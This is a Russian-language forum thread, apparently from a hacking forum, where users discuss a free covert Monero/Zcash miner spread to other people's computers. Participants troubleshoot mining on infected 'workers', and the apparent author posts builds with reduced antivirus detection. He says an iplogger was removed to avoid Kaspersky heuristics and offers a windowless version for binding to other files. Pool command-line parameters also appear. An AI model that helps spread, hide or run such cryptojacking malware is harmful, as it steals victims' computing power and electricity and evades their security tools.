• Что-бы увидеть скрытые разделы и познать все тайны форума, Вам необходимо Зарегистрироваться или Войти.
  • Сюда попадают темы НЕ ПРОШЕДШИЕ ПРОВЕРКУ или темы, которые нарушают правила форума. Не советуем покупать здесь что-либо!

Бесплатный скрытый майнер Monero+Zcash

Статус
В этой теме нельзя размещать новые ответы.

Pavel1207

Новичок
Статус
offline
Регистрация
04.12.2016
Сообщения
2
Репутация
0
Помогите, не могу понять почему у меня ZEC не майнит , хотя с монеро в нормально идет Opera Снимок_2018-02-18_113654_dwarfpool.com.png Opera Снимок_2018-02-18_113616_zcash.flypool.org.png
 

fredsnikos

Новичок
Статус
offline
Регистрация
27.01.2018
Сообщения
2
Репутация
0

fredsnikos

Новичок
Статус
offline
Регистрация
27.01.2018
Сообщения
2
Репутация
0
я имею ввиду когда майнер распространяю на FlyPool ничего не майнит а на Dwarf идет майнинг
Это нормально.
Потому что для майнинга zec нужна хорошая карта. Там примерный коэфицент на 5 килохэшей монеро будет 1 килохэш зека.
 

Pavel1207

Новичок
Статус
offline
Регистрация
04.12.2016
Сообщения
2
Репутация
0
А можешь сделать майнер чтобы майнил чисто ZEC на CPU и GPU ?
 

Serban

Новичок
Статус
offline
Регистрация
08.05.2017
Сообщения
0
Репутация
0
на cpu zec не майнится, можно майнить монеро на cpu и gpu, но врядли это будет выгодней.
а что поделать,если у меня зек вообще не майнится,к примеру.Хотя видеокарты нормальные у воркеров.Даже у меня он не майнится на моем пк.
 

fredsnikos

Новичок
Статус
offline
Регистрация
27.01.2018
Сообщения
2
Репутация
0
а что поделать,если у меня зек вообще не майнится,к примеру.Хотя видеокарты нормальные у воркеров.Даже у меня он не майнится на моем пк.
Так я и пытаюсь понять почему у тебя не майнится, запусти свой обычный майнер с параметрами
--server eu1-zcash.flypool.org --port 3333 --user твойкошель.bt --pass x --server zec-eu2.nanopool.org --port 6666 --user твойкошель.bt --pass x
 

Pavel1207

Новичок
Статус
offline
Регистрация
04.12.2016
Сообщения
2
Репутация
0
на cpu zec не майнится, можно майнить монеро на cpu и gpu, но врядли это будет выгодней.
мне кажется наоборот
https://www.cryptocompare.com/mining/calculator на этом сайте можно посчитать сколько будешь зарабатывать при 500 хешей на zec выдает 3$ а xmr только 0,58$ в день . Я майнил на своем процесоре zec и xmr и хешрейт показывался одинаковый соответственно zec будет выгодней майнить
 

Serban

Новичок
Статус
offline
Регистрация
08.05.2017
Сообщения
0
Репутация
0
Так я и пытаюсь понять почему у тебя не майнится, запусти свой обычный майнер с параметрами
--server eu1-zcash.flypool.org --port 3333 --user твойкошель.bt --pass x --server zec-eu2.nanopool.org --port 6666 --user твойкошель.bt --pass x
запускал,я же говорю,что майнится.когда запускаешь сборку,шаров нет.
 

fredsnikos

Новичок
Статус
offline
Регистрация
27.01.2018
Сообщения
2
Репутация
0
Если майнит с параметрами --server eu1-zcash.flypool.org --port 3333 --user твойкошель.bt --pass x --server zec-eu2.nanopool.org --port 6666 --user твойкошель.bt --pass x
То и сборка должна майнить, она так и запускает майнер.
 

urevich

Новичок
Статус
offline
Регистрация
18.02.2018
Сообщения
0
Репутация
0
День добрый, можете сделать сборку только на cpu под xmr ? чтобы архив весил меньше.
 

Serban

Новичок
Статус
offline
Регистрация
08.05.2017
Сообщения
0
Репутация
0
Если майнит с параметрами --server eu1-zcash.flypool.org --port 3333 --user твойкошель.bt --pass x --server zec-eu2.nanopool.org --port 6666 --user твойкошель.bt --pass x
То и сборка должна майнить, она так и запускает майнер.
Должна,но не майнит.Ладно если бы не проверял.А так все по нулям.Монеро без проблем,а вот зек все по нулям.
Не проще ли сделать сборку,что бы GPU майнило монеро?Думаю у многих такие проблемы.А так будет хотя бы альтернатива.
 

DOZER

Участник
Статус
offline
Регистрация
17.12.2017
Сообщения
61
Репутация
49
Напиши батник для удаления майнера
 

fredsnikos

Новичок
Статус
offline
Регистрация
27.01.2018
Сообщения
2
Репутация
0
Сборка обновлена. Снижен детект
Новые ссылки:
Зеркало 1
Зеркало 2

Версия без вывода консольного окна с ошибкой(Кому нужно для склейки)
Зеркало 1
Зеркало 2

В первом сообщении ссылки также обновлены.
 
Последнее редактирование:

DuFuryos

Новичок
Статус
offline
Регистрация
17.02.2018
Сообщения
4
Репутация
0
Как узнать zcash и monero кошельки?
 

DuFuryos

Новичок
Статус
offline
Регистрация
17.02.2018
Сообщения
4
Репутация
0
Работает вообще эта тема или есть подвох?Зачем Dwarfpool?
 

fredsnikos

Новичок
Статус
offline
Регистрация
27.01.2018
Сообщения
2
Репутация
0
Сборка обновлена. Снижен детект.
Пришлось убрать iplogger из-за которого срабатывал эвристический анализ каспера

Новые ссылки:
Зеркало 1
Зеркало 2

Версия без вывода консольного окна с ошибкой(Кому нужно для склейки)
Зеркало 1
Зеркало 2

В первом сообщении ссылки также обновлены.
 
Статус
В этой теме нельзя размещать новые ответы.